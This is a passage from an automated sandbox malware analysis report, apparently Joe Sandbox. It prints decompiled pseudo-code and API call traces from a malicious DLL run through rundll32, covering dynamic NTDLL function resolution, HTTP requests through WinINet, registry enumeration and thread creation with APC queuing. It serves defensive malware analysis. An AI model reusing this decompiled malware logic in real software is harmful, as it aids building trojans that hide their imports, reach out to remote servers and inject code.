                                										_v8 = _t44;
                                										if(_t44 != 0) {
                                											goto L8;
                                										} else {
                                											 *_a12 = _t54;
                                										}
                                									}
                                								}
                                							}
                                						}
                                					}
                                				}
                                				return _v8;
                                			}


                                APIs
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,03434046,?,?,?,?,00000000,00000000), ref: 03434503
                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 03434525
                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 0343453B
                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 03434551
                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 03434567
                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 0343457D
                                  • Part of subcall function 0343190C: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000,0343459D), ref: 03431969
                                  • Part of subcall function 0343190C: memset.NTDLL ref: 0343198B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                • String ID:
                                • API String ID: 3012371009-0
                                • Opcode ID: d2abda943b6a0d6a9ca6f36a6e38f12e53705effd62304101bcc02f14b459bd3
                                • Instruction ID: 304853717cd3fd98f48ef20ea339543a0040e8b7e61c8c396f9bb4ba78090d08
                                • Opcode Fuzzy Hash: d2abda943b6a0d6a9ca6f36a6e38f12e53705effd62304101bcc02f14b459bd3
                                • Instruction Fuzzy Hash: 2E217CB091070AAFD751EF6AC884F9BB7FCEF592107054026EA45DF310DB70E9058BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E03436954(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                				void* __esi;
                                				long _t10;
                                				void* _t18;
                                				void* _t22;
                                
                                				_t9 = __eax;
                                				_t22 = __eax;
                                				if(_a4 != 0) {
                                					_t9 = E034345C4(__eax + 4, _t18, _a4, __eax, __eax + 4); // executed
                                					if(_t9 == 0) {
                                						L9:
                                						return GetLastError();
                                					}
                                				}
                                				_t10 = E03437AF1(_t9, _t18, _t22, _a8); // executed
                                				if(_t10 == 0) {
                                					ResetEvent( *(_t22 + 0x1c));
                                					ResetEvent( *(_t22 + 0x20));
                                					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                                						SetEvent( *(_t22 + 0x1c));
                                						goto L7;
                                					} else {
                                						_t10 = GetLastError();
                                						if(_t10 == 0x3e5) {
                                							L7:
                                							_t10 = 0;
                                						}
                                					}
                                				}
                                				if(_t10 == 0xffffffff) {
                                					goto L9;
                                				}
                                				return _t10;
                                			}


                                APIs
                                • ResetEvent.KERNEL32(?,00000008,?,?,00000102,034337A0,?,?,76CC81D0,00000000), ref: 0343698E
                                • ResetEvent.KERNEL32(?), ref: 03436993
                                • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 034369A0
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,0343593D,00000000,?,?), ref: 034369AB
                                • GetLastError.KERNEL32(?,?,00000102,034337A0,?,?,76CC81D0,00000000), ref: 034369C6
                                  • Part of subcall function 034345C4: lstrlen.KERNEL32(00000000,00000008,?,76C84D40,?,?,03436973,?,?,?,?,00000102,034337A0,?,?,76CC81D0), ref: 034345D0
                                  • Part of subcall function 034345C4: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,03436973,?,?,?,?,00000102,034337A0,?), ref: 0343462E
                                  • Part of subcall function 034345C4: lstrcpy.KERNEL32(00000000,00000000), ref: 0343463E
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0343593D,00000000,?), ref: 034369B9
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                • String ID:
                                • API String ID: 3739416942-0
                                • Opcode ID: 21d18b1b3beff0c7f6184ed98340525bf758cf563f0ad4814796a5316f557884
                                • Instruction ID: 6ad5b486139885b129e6cf739247b0758cd5d196c3870c9f76b2f83881da01ba
                                • Opcode Fuzzy Hash: 21d18b1b3beff0c7f6184ed98340525bf758cf563f0ad4814796a5316f557884
                                • Instruction Fuzzy Hash: 1801A271104202BADB30AA71DD84F5BFAF8EF4A360F150626F551EB1E0C764D414DE18
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,00000000,0348893A,0349A174,03490998), ref: 034873C1
                                • QueueUserAPC.KERNEL32(0348893A,00000000,?,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873D6
                                • GetLastError.KERNEL32(00000000,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873E1
                                • TerminateThread.KERNEL32(00000000,00000000,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873EB
                                • CloseHandle.KERNEL32(00000000,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873F2
                                • SetLastError.KERNEL32(00000000,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873FB
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                • String ID:
                                • API String ID: 3832013932-0
                                • Opcode ID: 8748b135db34dd0ac4cbffae2df6e0812526af85c16ab48a9d9720a51537f762
                                • Instruction ID: 514a435424df011ac88a4d1eb8914eb0ed1080a6a79a18e395224e09213389fc
                                • Opcode Fuzzy Hash: 8748b135db34dd0ac4cbffae2df6e0812526af85c16ab48a9d9720a51537f762
                                • Instruction Fuzzy Hash: 83F08C32605220BBD7237FA0AC0AF5FBFA8FF2AB51F258446F601B8158C72188118B95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 88%
                                			E03433472(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                				signed int _v8;
                                				char _v12;
                                				signed int* _v16;
                                				char _v284;
                                				void* __esi;
                                				char* _t59;
                                				intOrPtr* _t60;
                                				void* _t62;
                                				intOrPtr _t64;
                                				char _t65;
                                				void* _t67;
                                				intOrPtr _t68;
                                				intOrPtr _t69;
                                				void* _t70;
                                				intOrPtr _t71;
                                				void* _t73;
                                				signed int _t81;
                                				void* _t91;
                                				void* _t92;
                                				char _t98;
                                				signed int* _t100;
                                				intOrPtr* _t101;
                                				void* _t102;
                                
                                				_t92 = __ecx;
                                				_v8 = _v8 & 0x00000000;
                                				_t98 = _a16;
                                				if(_t98 == 0) {
                                					__imp__( &_v284,  *0x343a3dc);
                                					_t91 = 0x80000002;
                                					L6:
                                					_t59 = E034361FC( &_v284,  &_v284);
                                					_a8 = _t59;
                                					if(_t59 == 0) {
                                						_v8 = 8;
                                						L29:
                                						_t60 = _a20;
                                						if(_t60 != 0) {
                                							 *_t60 =  *_t60 + 1;
                                						}
                                						return _v8;
                                					}
                                					_t101 = _a24;
                                					_t62 = E03436F28(_t92, _t97, _t101, _t91, _t59); // executed
                                					if(_t62 != 0) {
                                						L27:
                                						E03436C2C(_a8);
                                						goto L29;
                                					}
                                					_t64 =  *0x343a318; // 0x55e9d70
                                					_t16 = _t64 + 0xc; // 0x55e9e92
                                					_t65 = E034361FC(_t64,  *_t16);
                                					_a24 = _t65;
                                					if(_t65 == 0) {
                                						L14:
                                						_t29 = _t101 + 0x14; // 0x102
                                						_t33 = _t101 + 0x10; // 0x3d034390, executed
                                						_t67 = E03434822(_t97,  *_t33, _t91, _a8,  *0x343a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
                                						if(_t67 == 0) {
                                							_t68 =  *0x343a348; // 0x21ad5a8
                                							if(_t98 == 0) {
                                								_t35 = _t68 + 0x343ba4c; // 0x4d4c4b48
                                								_t69 = _t35;
                                							} else {
                                								_t34 = _t68 + 0x343ba47; // 0x55434b48
                                								_t69 = _t34;
                                							}
                                							_t70 = E034362F6(_t69,  *0x343a3d4,  *0x343a3d8,  &_a24,  &_a16); // executed
                                							if(_t70 == 0) {
                                								if(_t98 == 0) {
                                									_t71 =  *0x343a348; // 0x21ad5a8
                                									_t44 = _t71 + 0x343b842; // 0x74666f53
                                									_t73 = E034361FC(_t44, _t44);
                                									_t99 = _t73;
                                									if(_t73 == 0) {
                                										_v8 = 8;
                                									} else {
                                										_t47 = _t101 + 0x10; // 0x3d034390
                                										E034374B6( *_t47, _t91, _a8,  *0x343a3d8, _a24);
                                										_t49 = _t101 + 0x10; // 0x3d034390
                                										E034374B6( *_t49, _t91, _t99,  *0x343a3d0, _a16);
                                										E03436C2C(_t99);
                                									}
                                								} else {
                                									_t40 = _t101 + 0x10; // 0x3d034390, executed
                                									E034374B6( *_t40, _t91, _a8,  *0x343a3d8, _a24); // executed
                                									_t43 = _t101 + 0x10; // 0x3d034390
                                									E034374B6( *_t43, _t91, _a8,  *0x343a3d0, _a16);
                                								}
                                								if( *_t101 != 0) {
                                									E03436C2C(_a24);
                                								} else {
                                									 *_t101 = _a16;
                                								}
                                							}
                                						}
                                						goto L27;
                                					}
                                					_t21 = _t101 + 0x10; // 0x3d034390, executed
                                					_t81 = E034312CA( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
                                					if(_t81 == 0) {
                                						_t100 = _v16;
                                						if(_v12 == 0x28) {
                                							 *_t100 =  *_t100 & _t81;
                                							_t26 = _t101 + 0x10; // 0x3d034390
                                							E03434822(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                						}
                                						E03436C2C(_t100);
                                						_t98 = _a16;
                                					}
                                					E03436C2C(_a24);
                                					goto L14;
                                				}
                                				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                					goto L29;
                                				} else {
                                					_t97 = _a8;
                                					E03437A1E(_t98, _a8,  &_v284);
                                					__imp__(_t102 + _t98 - 0x117,  *0x343a3dc);
                                					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                					_t91 = 0x80000003;
                                					goto L6;
                                				}
                                			}

                                APIs
                                • StrChrA.SHLWAPI(03437168,0000005F,00000000,00000000,00000104), ref: 034334A5
                                • lstrcpy.KERNEL32(?,?), ref: 034334D2
                                  • Part of subcall function 034361FC: lstrlen.KERNEL32(?,00000000,055E9D70,00000000,034339E8,055E9F93,69B25F44,?,?,?,?,69B25F44,00000005,0343A00C,4D283A53,?), ref: 03436203
                                  • Part of subcall function 034361FC: mbstowcs.NTDLL ref: 0343622C
                                  • Part of subcall function 034361FC: memset.NTDLL ref: 0343623E
                                  • Part of subcall function 034374B6: lstrlenW.KERNEL32(?,?,?,0343363B,3D034390,80000002,03437168,03437283,74666F53,4D4C4B48,03437283,?,3D034390,80000002,03437168,?), ref: 034374DB
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                • lstrcpy.KERNEL32(?,00000000), ref: 034334F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                • String ID: ($\
                                • API String ID: 3924217599-1512714803
                                • Opcode ID: 506d4d5521ba34d82a33cd73555482f6d41c648e4c2ecca27aa0b2e20b05d4a8
                                • Instruction ID: dd74624cdec3ca089dbfc5831122a9640ff76419b4a2433f3153df7354dff1ce
                                • Opcode Fuzzy Hash: 506d4d5521ba34d82a33cd73555482f6d41c648e4c2ecca27aa0b2e20b05d4a8
                                • Instruction Fuzzy Hash: 82516A7910020AEFCF61EF60DC40E9A7BB9EF0A340F04851AF955AF260D735D925AB19
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E034371B6(void* __ecx, intOrPtr _a4) {
                                				int* _v8;
                                				int _v12;
                                				int* _v16;
                                				int _v20;
                                				int* _v24;
                                				char* _v28;
                                				void* _v32;
                                				long _t33;
                                				char* _t35;
                                				long _t39;
                                				long _t42;
                                				intOrPtr _t47;
                                				void* _t51;
                                				long _t53;
                                
                                				_t51 = __ecx;
                                				_v8 = 0;
                                				_v16 = 0;
                                				_v12 = 0;
                                				_v24 = 0;
                                				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
                                				_t53 = _t33;
                                				if(_t53 != 0) {
                                					L18:
                                					return _t53;
                                				}
                                				_t53 = 8;
                                				_t35 = E03436D63(0x104);
                                				_v28 = _t35;
                                				if(_t35 == 0) {
                                					L17:
                                					RegCloseKey(_v32); // executed
                                					goto L18;
                                				}
                                				_v20 = 0x104;
                                				do {
                                					_v16 = _v20;
                                					_v12 = 0x104;
                                					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
                                					_t53 = _t39;
                                					if(_t53 != 0xea) {
                                						if(_t53 != 0) {
                                							L14:
                                							if(_t53 == 0x103) {
                                								_t53 = 0;
                                							}
                                							L16:
                                							E03436C2C(_v28);
                                							goto L17;
                                						}
                                						_t42 = E03433472(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
                                						_t53 = _t42;
                                						if(_t53 != 0) {
                                							goto L14;
                                						}
                                						goto L12;
                                					}
                                					if(_v12 <= 0x104) {
                                						if(_v16 <= _v20) {
                                							goto L16;
                                						}
                                						E03436C2C(_v24);
                                						_v20 = _v16;
                                						_t47 = E03436D63(_v16);
                                						_v24 = _t47;
                                						if(_t47 != 0) {
                                							L6:
                                							_t53 = 0;
                                							goto L12;
                                						}
                                						_t53 = 8;
                                						goto L16;
                                					}
                                					_v8 = _v8 + 1;
                                					goto L6;
                                					L12:
                                				} while (WaitForSingleObject( *0x343a30c, 0) == 0x102);
                                				goto L16;
                                			}

                                APIs
                                • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,03437168,?), ref: 034371DC
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • RegEnumKeyExA.KERNEL32(?,?,?,03437168,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,03437168), ref: 03437223
                                • WaitForSingleObject.KERNEL32(00000000,?,?,?,03437168,?,03437168,?,?,?,?,?,03437168,?), ref: 03437290
                                • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,03437168,?), ref: 034372B8
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                • String ID: !s
                                • API String ID: 3664505660-1801701826
                                • Opcode ID: e4cf54ac31be95582d2245b876f14f8e25215c00c9dbd0f795b965840bfb7d46
                                • Instruction ID: b4a45f5765cee1824c061407f797cc72d47feaf691dd0ac87a74edc949541b6e
                                • Opcode Fuzzy Hash: e4cf54ac31be95582d2245b876f14f8e25215c00c9dbd0f795b965840bfb7d46
                                • Instruction Fuzzy Hash: 10315AB5C04219AFCF21EFA5D8849EFFEB9EB4A710F144067F991BB210D6750A408B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 57%
                                			E03433D2C(signed int __edx) {
                                				signed int _v8;
                                				long _v12;
                                				CHAR* _v16;
                                				long _v20;
                                				void* __ebx;
                                				void* __edi;
                                				void* __esi;
                                				void* _t21;
                                				CHAR* _t22;
                                				CHAR* _t25;
                                				intOrPtr _t26;
                                				void* _t27;
                                				void* _t31;
                                				void* _t32;
                                				CHAR* _t36;
                                				CHAR* _t42;
                                				CHAR* _t43;
                                				CHAR* _t44;
                                				void* _t49;
                                				void* _t51;
                                				signed char _t56;
                                				intOrPtr _t58;
                                				signed int _t59;
                                				void* _t63;
                                				CHAR* _t67;
                                				CHAR* _t68;
                                				char* _t69;
                                				void* _t70;
                                
                                				_t61 = __edx;
                                				_v20 = 0;
                                				_v8 = 0;
                                				_v12 = 0;
                                				_t21 = E03433CFD();
                                				if(_t21 != 0) {
                                					_t59 =  *0x343a2fc; // 0x4000000a
                                					_t55 = (_t59 & 0xf0000000) + _t21;
                                					 *0x343a2fc = (_t59 & 0xf0000000) + _t21;
                                				}
                                				_t22 =  *0x343a178(0, 2); // executed
                                				_v16 = _t22;
                                				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                					_t25 = E0343389E( &_v8,  &_v20); // executed
                                					_t54 = _t25;
                                					_t26 =  *0x343a348; // 0x21ad5a8
                                					if( *0x343a2fc > 5) {
                                						_t8 = _t26 + 0x343b5c5; // 0x4d283a53
                                						_t27 = _t8;
                                					} else {
                                						_t7 = _t26 + 0x343b9fd; // 0x44283a44
                                						_t27 = _t7;
                                					}
                                					E03436B80(_t27, _t27);
                                					_t31 = E034376BB(_t61,  &_v20,  &_v12); // executed
                                					if(_t31 == 0) {
                                						CloseHandle(_v20);
                                					}
                                					_t63 = 5;
                                					if(_t54 != _t63) {
                                						 *0x343a310 =  *0x343a310 ^ 0x81bbe65d;
                                						_t32 = E03436D63(0x60);
                                						 *0x343a3cc = _t32;
                                						__eflags = _t32;
                                						if(_t32 == 0) {
                                							_push(8);
                                							_pop(0);
                                						} else {
                                							memset(_t32, 0, 0x60);
                                							_t49 =  *0x343a3cc; // 0x55e95b0
                                							_t70 = _t70 + 0xc;
                                							__imp__(_t49 + 0x40);
                                							_t51 =  *0x343a3cc; // 0x55e95b0
                                							 *_t51 = 0x343b827;
                                						}
                                						_t54 = 0;
                                						__eflags = 0;
                                						if(0 == 0) {
                                							_t36 = RtlAllocateHeap( *0x343a2d8, 0, 0x43);
                                							 *0x343a368 = _t36;
                                							__eflags = _t36;
                                							if(_t36 == 0) {
                                								_push(8);
                                								_pop(0);
                                							} else {
                                								_t56 =  *0x343a2fc; // 0x4000000a
                                								_t61 = _t56 & 0x000000ff;
                                								_t58 =  *0x343a348; // 0x21ad5a8
                                								_t13 = _t58 + 0x343b552; // 0x697a6f4d
                                								_t55 = _t13;
                                								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x3439287);
                                							}
                                							_t54 = 0;
                                							__eflags = 0;
                                							if(0 == 0) {
                                								asm("sbb eax, eax");
                                								E03433365( ~_v8 &  *0x343a310, 0x343a00c); // executed
                                								_t42 = E03431645(0, _t55, _t63, 0x343a00c); // executed
                                								_t54 = _t42;
                                								__eflags = _t54;
                                								if(_t54 != 0) {
                                									goto L30;
                                								}
                                								_t43 = E03433981(); // executed
                                								__eflags = _t43;
                                								if(_t43 != 0) {
                                									__eflags = _v8;
                                									_t67 = _v12;
                                									if(_v8 != 0) {
                                										L29:
                                										_t44 = E0343661D(_t61, _t67, _v8); // executed
                                										_t54 = _t44;
                                										goto L30;
                                									}
                                									__eflags = _t67;
                                									if(__eflags == 0) {
                                										goto L30;
                                									}
                                									_t54 = E0343529C(__eflags,  &(_t67[4]));
                                									__eflags = _t54;
                                									if(_t54 == 0) {
                                										goto L30;
                                									}
                                									goto L29;
                                								}
                                								_t54 = 8;
                                							}
                                						}
                                					} else {
                                						_t68 = _v12;
                                						if(_t68 == 0) {
                                							L30:
                                							if(_v16 == 0 || _v16 == 1) {
                                								 *0x343a17c(); // executed
                                							}
                                							goto L34;
                                						}
                                						_t69 =  &(_t68[4]);
                                						do {
                                						} while (E03437928(_t63, _t69, 0, 1) == 0x4c7);
                                					}
                                					goto L30;
                                				} else {
                                					_t54 = _t22;
                                					L34:
                                					return _t54;
                                				}
                                			}

                                APIs
                                  • Part of subcall function 03433CFD: GetModuleHandleA.KERNEL32(4C44544E,00000000,03433D44,00000001), ref: 03433D0C
                                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 03433DC1
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • memset.NTDLL ref: 03433E11
                                • RtlInitializeCriticalSection.NTDLL(055E9570), ref: 03433E22
                                  • Part of subcall function 0343529C: memset.NTDLL ref: 034352B6
                                  • Part of subcall function 0343529C: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 034352FC
                                  • Part of subcall function 0343529C: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 03435307
                                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 03433E4D
                                • wsprintfA.USER32 ref: 03433E7D
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                • String ID:
                                • API String ID: 4246211962-0
                                • Opcode ID: 3fbfff1884876c417af9a5bcc32702407572e8faa712a20466410c8ce5272fd6
                                • Instruction ID: 596fb4181049a80a812593d0483f82308df16f3bdb9d3791e78be732f11bee2b
                                • Opcode Fuzzy Hash: 3fbfff1884876c417af9a5bcc32702407572e8faa712a20466410c8ce5272fd6
                                • Instruction Fuzzy Hash: 6651DF79A41215AFDB11FFA5D88ABAF77F8EB0EB00F08046BE541EF244D7B195408B58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 22%
                                			E034319E2(signed int __eax, signed int _a4, signed int _a8) {
                                				signed int _v8;
                                				signed int _v12;
                                				intOrPtr _v16;
                                				signed int _v20;
                                				intOrPtr _t81;
                                				char _t83;
                                				signed int _t90;
                                				signed int _t97;
                                				signed int _t99;
                                				char _t101;
                                				unsigned int _t102;
                                				intOrPtr _t103;
                                				char* _t107;
                                				signed int _t110;
                                				signed int _t113;
                                				signed int _t118;
                                				signed int _t122;
                                				intOrPtr _t124;
                                
                                				_t102 = _a8;
                                				_t118 = 0;
                                				_v20 = __eax;
                                				_t122 = (_t102 >> 2) + 1;
                                				_v8 = 0;
                                				_a8 = 0;
                                				_t81 = E03436D63(_t122 << 2);
                                				_v16 = _t81;
                                				if(_t81 == 0) {
                                					_push(8);
                                					_pop(0);
                                					L37:
                                					return 0;
                                				}
                                				_t107 = _a4;
                                				_a4 = _t102;
                                				_t113 = 0;
                                				while(1) {
                                					_t83 =  *_t107;
                                					if(_t83 == 0) {
                                						break;
                                					}
                                					if(_t83 == 0xd || _t83 == 0xa) {
                                						if(_t118 != 0) {
                                							if(_t118 > _v8) {
                                								_v8 = _t118;
                                							}
                                							_a8 = _a8 + 1;
                                							_t118 = 0;
                                						}
                                						 *_t107 = 0;
                                						goto L16;
                                					} else {
                                						if(_t118 != 0) {
                                							L10:
                                							_t118 = _t118 + 1;
                                							L16:
                                							_t107 = _t107 + 1;
                                							_t15 =  &_a4;
                                							 *_t15 = _a4 - 1;
                                							if( *_t15 != 0) {
                                								continue;
                                							}
                                							break;
                                						}
                                						if(_t113 == _t122) {
                                							L21:
                                							if(_a8 <= 0x20) {
                                								_push(0xb);
                                								L34:
                                								_pop(0);
                                								L35:
                                								E03436C2C(_v16);
                                								goto L37;
                                							}
                                							_t24 = _v8 + 5; // 0xcdd8d2f8
                                							_t103 = E03436D63((_v8 + _t24) * _a8 + 4);
                                							if(_t103 == 0) {
                                								_push(8);
                                								goto L34;
                                							}
                                							_t90 = _a8;
                                							_a4 = _a4 & 0x00000000;
                                							_v8 = _v8 & 0x00000000;
                                							_t124 = _t103 + _t90 * 4;
                                							if(_t90 <= 0) {
                                								L31:
                                								 *0x343a318 = _t103;
                                								goto L35;
                                							}
                                							do {
                                								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                								_v12 = _v12 & 0x00000000;
                                								if(_a4 <= 0) {
                                									goto L30;
                                								} else {
                                									goto L26;
                                								}
                                								while(1) {
                                									L26:
                                									_t99 = _v12;
                                									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                									if(_t99 == 0) {
                                										break;
                                									}
                                									_v12 = _v12 + 1;
                                									if(_v12 < _a4) {
                                										continue;
                                									}
                                									goto L30;
                                								}
                                								_v8 = _v8 - 1;
                                								L30:
                                								_t97 = _a4;
                                								_a4 = _a4 + 1;
                                								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                								__imp__(_t124);
                                								_v8 = _v8 + 1;
                                								_t124 = _t124 + _t97 + 1;
                                							} while (_v8 < _a8);
                                							goto L31;
                                						}
                                						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                						_t101 = _t83;
                                						if(_t83 - 0x61 <= 0x19) {
                                							_t101 = _t101 - 0x20;
                                						}
                                						 *_t107 = _t101;
                                						_t113 = _t113 + 1;
                                						goto L10;
                                					}
                                				}
                                				if(_t118 != 0) {
                                					if(_t118 > _v8) {
                                						_v8 = _t118;
                                					}
                                					_a8 = _a8 + 1;
                                				}
                                				goto L21;
                                			}

                                APIs
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 03431ADF
                                • lstrcat.KERNEL32(69B25F45,00000020), ref: 03431AF4
                                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 03431B0B
                                • lstrlen.KERNEL32(69B25F45), ref: 03431B2F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
• Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: a926355b43fa860230c82a54ce46bc24e03090f0523bfe154459bb80017a3b1a
                                • Instruction ID: 727d950ab497bc4192c12dcb03b23ee6b739f7d021c2cff1776125bf0f977cb8
                                • Opcode Fuzzy Hash: a926355b43fa860230c82a54ce46bc24e03090f0523bfe154459bb80017a3b1a
